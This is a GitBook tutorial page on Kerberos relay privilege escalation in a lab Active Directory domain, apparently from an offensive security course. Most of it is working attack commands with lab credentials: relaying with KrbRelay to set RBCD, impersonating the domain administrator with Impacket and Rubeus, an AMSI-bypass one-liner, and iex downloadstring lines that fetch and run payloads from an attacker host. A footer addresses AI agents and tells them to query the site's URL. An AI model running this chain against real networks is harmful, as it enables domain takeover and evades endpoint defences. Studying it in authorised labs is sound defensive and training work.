# KrbRelay Up - Linux

* Another very useful technic to escalate privileges is kerberos relay, like implemented in [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
* As KrbRelayUp is detected by defender, we will use the step by step approach like [this writeup](https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9) by @an0n\_r0, using @cube0x0 [KrbRelay](https://github.com/cube0x0/KrbRelay)
* At the time of writing KrbRelay is not detected by defender.
* The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :

```
 crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
```

<figure><img src="/files/tU4kCzcqtdxoXnOuaaFn" alt=""><figcaption></figcaption></figure>

**Add computer and RBCD**

* To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module

```
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
```

<figure><img src="/files/oi1fqkuBtujqX1tBhwWk" alt=""><figcaption></figcaption></figure>

### Add computer :&#x20;

```
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
```

### Get the SID of that computer:&#x20;

#### From windows

```
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
```

#### From Linux

```
lookupsid.py  -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
```

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
```

### Check ports

#### xrdp

```
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
```

```
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
```

### Launch krbrelay

CLISID: `CIeAxiInstallerService Class`

```
https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
```

```
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
```

<figure><img src="/files/bGeGQInPsLZCvmYuymHb" alt=""><figcaption></figcaption></figure>

### Now we finish with RBCD exploitation

#### From Linux Impacket :&#x20;

```
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator
```

<figure><img src="/files/kONCWmnrE6nty4QJGQP1" alt=""><figcaption></figcaption></figure>

#### with Rubeus from Windows

```
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
```

* And just like the writeup made by @an0n\_r0 we launch [SCMUACBypass.exe](https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82) by Tyranid and get a system shell

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/privesc_withrubeus.png" alt=""><figcaption></figcaption></figure>

Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:&#x20;

```
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
```

* KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on [this page](https://github.com/Dec0ne/KrbRelayUp), this is leave as an exercice to the reader.

**With other methods**

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-iis-and-privilege-escalation/krbrelay-up-linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.